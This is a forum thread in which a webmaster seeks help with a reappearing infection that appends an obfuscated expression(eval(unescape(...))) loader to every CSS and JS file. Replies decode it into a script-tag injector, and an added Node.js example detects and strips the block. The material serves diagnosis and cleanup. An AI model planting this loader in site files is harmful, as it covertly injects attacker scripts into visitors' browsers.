Need help removing virus from my site.


King_Ato

11:14 am on May 15, 2008 (gmt 0)

10+ Year Member



There is apparently a virus on my site. I did a search and found others who seemed to have the same problem. It looked like they concluded it was just a "false positive" and only a problem with the Avast anti-virus software. But I think mine is more than that. Here's a picture of the warning an Avast user gets: [snipped]

Note the file: /phpBB3/styles/subsilver2/epiw/check.js

Now I'm not using phpBB anymore. I switched to PunBB. I deleted everything that even mentioned phpBB, but almost every single day this phpBB3 folder pops up on my server. I delete it every time, but it always comes back. And whenever it's there, the virus warning pops up for Avast users (and maybe other users too, I don't know). And even more frustrating, it adds this code way at the bottom of every single one of my .css and .js files:

/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%
65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%
27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%
3B%20%4A%53%53%32%20%3D%20%36%39%34%30%39%38%3B%20%4A%53%
53%33%20%3D%20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%
73%2F%73%75%62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%64%
75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%
20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%
6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%
73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%
20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%73%2F%73%75%
62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%63%68%65%63%6B%
2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%
64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%
73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%
69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%
28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

If I delete this code from any of the files it's on, it will just come back whenever the phpBB3 folder comes back. I even went through every single one of my css and js files and deleted this, but the folder still came back, along with the code. Also, changing my password didn't have any effect.

Can you help me?

[edited by: phranque at 11:37 am (utc) on May 15, 2008]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]

bwnbwn

12:57 pm on May 15, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



First thing I would do is contact my hosting company for some assistance in getting to the bottom of this. Without knowing if this is a hosted, dedicated, or VPS server, there is little we can do here without first contacting your host.

WesleyC

1:46 pm on May 15, 2008 (gmt 0)

10+ Year Member



One thing you might try is to run a block of Javascript code...

<script type="text/javascript">
alert( unescape('%69%66%20%28%21%64%6F%63%75%6D%
65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%
27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%
3B%20%4A%53%53%32%20%3D%20%36%39%34%30%39%38%3B%20%4A%53%
53%33%20%3D%20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%
73%2F%73%75%62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%64%
75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%
20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%
6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%
73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%
20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%73%2F%73%75%
62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%63%68%65%63%6B%
2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%
64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%
73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%
69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%
28%6A%73%29%20%7D%3B%20'));
</script>

After doing something similar on my own machine, this is the resulting code:

if (!document.getElementById('JSSS'))
{
JSS1 = 59;
JSS2 = 694098;
JSS3 = '/phpBB3/styles/subsilver2/epiw/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/phpBB3/styles/subsilver2/epiw/check.js');
js.setAttribute('id', 'JSSS');
document.getElementsByTagName('head').item(0).appendChild(js)
};

This code is being run in every one of your javascript and CSS files, but all it's doing is creating a <script> tag in the head of every page the user views pointing to '/phpBB3/styles/subsilver2/epiw/check.js'. I highly recommend that you check this file to see what it contains.
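Added example (not code from the thread): a small Node.js checker that does the decoding WesleyC describes and applies it across stylesheet/script text. It finds the "expression(eval(unescape('...')))" block, decodes the percent-encoded payload the way the legacy unescape() would, reports the script path the payload injects into <head>, and strips the block. The sample CSS and the two 32-hex comment markers are constructed for the example.

```javascript
// Matches the injected rule seen in the thread: optional /* <32 hex> */ marker,
// body { margin-top: expression(eval(unescape('...'))) }, optional trailing marker.
// The payload group tolerates line wrapping, since the blob is often split over lines.
const INJECTION_RE =
  /(?:\/\*\s*[0-9a-f]{32}\s*\*\/\s*)?body\s*\{\s*margin-top:\s*expression\(\s*eval\(\s*unescape\(\s*'([^']*)'\s*\)\s*\)\s*\)\s*\}(?:\s*\/\*\s*[0-9a-f]{32}\s*\*\/)?/gi;

// Mirrors the legacy unescape(): %uXXXX -> UTF-16 unit, %XX -> single byte.
function unescapeLikeBrowser(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Returns one record per injected block: where it sits, the decoded JavaScript,
// and the src the payload assigns to the <script> element it creates.
function findInjections(text) {
  const hits = [];
  for (const m of text.matchAll(INJECTION_RE)) {
    const decoded = unescapeLikeBrowser(m[1].replace(/\s+/g, ''));
    const src = /setAttribute\('src',\s*'([^']+)'\)/.exec(decoded);
    hits.push({ offset: m.index, length: m[0].length, src: src ? src[1] : null, decoded });
  }
  return hits;
}

// Removes every injected block; the rest of the file is left untouched.
function stripInjections(text) {
  return text.replace(INJECTION_RE, '').trimEnd();
}

// Helper used only to build the constructed sample below (inverse of the decoder).
function percentEncode(s) {
  return Array.from(s, c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Constructed sample stylesheet: two legitimate rules plus an appended injection
// whose payload is the same loader logic WesleyC decoded (placeholder hex markers).
const SAMPLE_CSS = `body { margin: 0; }
.post { color: #333; }

/* 0123456789abcdef0123456789abcdef */ body { margin-top: expression(eval(unescape('${percentEncode(
  "if (!document.getElementById('JSSS')){ var js = document.createElement('script'); js.setAttribute('src', '/phpBB3/styles/subsilver2/epiw/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };"
)}'))) } /* fedcba9876543210fedcba9876543210 */`;

for (const hit of findInjections(SAMPLE_CSS)) {
  console.log(`injection at offset ${hit.offset}: loads ${hit.src}`);
}
```

Stripping the block only removes the symptom: as the thread shows, the files get rewritten again while the attacker's access path remains, so the decoded src is mainly useful as the path to pull from the server and as a signature to alert on.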

King_Ato

9:42 pm on May 15, 2008 (gmt 0)

10+ Year Member



Alright, I will definitely contact my host.

And Wesley, I can't check that file right now because it's currently deleted. But I will when it comes back. Though I am pretty sure whenever I opened it last time it was just blank.

WesleyC

1:34 pm on May 16, 2008 (gmt 0)

10+ Year Member



If it's blank, then most likely your users' data/security was not compromised, unless whatever/whoever was putting this stuff in place is VERY good and either used this as a red herring to cover for a real virus somewhere else in your pages or somehow figured out how to use binary data in a .js file to compromise a user's system (highly unlikely). You could check the latter case by opening the file when it reappears with a binary/hex editor.

dailypress

7:17 pm on May 16, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I had a similar issue until I found out that the hosting company itself would add code to the bottom of each page.

pageoneresults

7:30 pm on May 16, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Welcome to WebmasterWorld King_Ato!

If you search Google for "expression(eval(unescape" you'll find a topic that discusses what this particular script may be doing; it's very generic. Something to do with posting to the forums. I'd be changing passwords right now just to be on the safe side, and contacting the host immediately if they are responsible for maintaining the install. There may be some sort of injection or cross-site scripting vulnerability taking place, I think.

King_Ato

3:17 am on Jun 20, 2008 (gmt 0)

10+ Year Member



I just got a message from a user who has the same problem. I'm assuming people are searching and finding this thread, so I figure I should post an update here:

No, I have not found a solution yet, at least not a permanent one. My host went through and removed 72 iframes that they found injected. They thought that would solve it, but it didn't. I recently noticed, however, that a cgi-bin folder gets uploaded to my server several hours (maybe even a day) before the phpbb3 folder comes back. It apparently acts as a gateway to the virus. So what I've been doing is just deleting the cgi-bin whenever it comes. I just have to be sure to check my server every day and delete the cgi-bin ASAP so the phpbb3 folder can't come back, and then that virus warning will never appear.

Hopefully my host will find a solution soon. If anybody else has any other ideas, I would love to hear them.

pageoneresults

4:48 am on Jun 20, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



The virus is in the db. You'll need to restore the db from a date when the virus was not present, based on my understanding, although I could be wrong. It sure sounds like it, though, based on what you are describing. Hold on, there's another topic around here that may provide some further instructions...

SQL Injection Virus Problems
[webmasterworld.com...]

King_Ato

8:02 am on Jun 30, 2008 (gmt 0)

10+ Year Member



Hey guys, sorry to bump this thread again, but I've made a new discovery. I don't know how I didn't realize this before, but that cgi-bin folder that I mentioned (the gateway to the virus) only gets loaded on my server after I log in to my cpanel. If I don't log in to cpanel, the cgi-bin will never appear, and I have no virus to worry about. So this probably means that there's a very simple solution to this, but I'm not web-savvy enough to know what it is. What is happening when I log into my cpanel?

And thanks for that link pageone, though I couldn't really figure out a solution from it.

[edited by: King_Ato at 8:05 am (utc) on June 30, 2008]

jake66

7:52 am on Jul 1, 2008 (gmt 0)

10+ Year Member



Did you report it to cpanel?
[cpanel.net...]

If it's a hole in the application, I'm sure they'll release a fix that will remedy whatever it is that got you.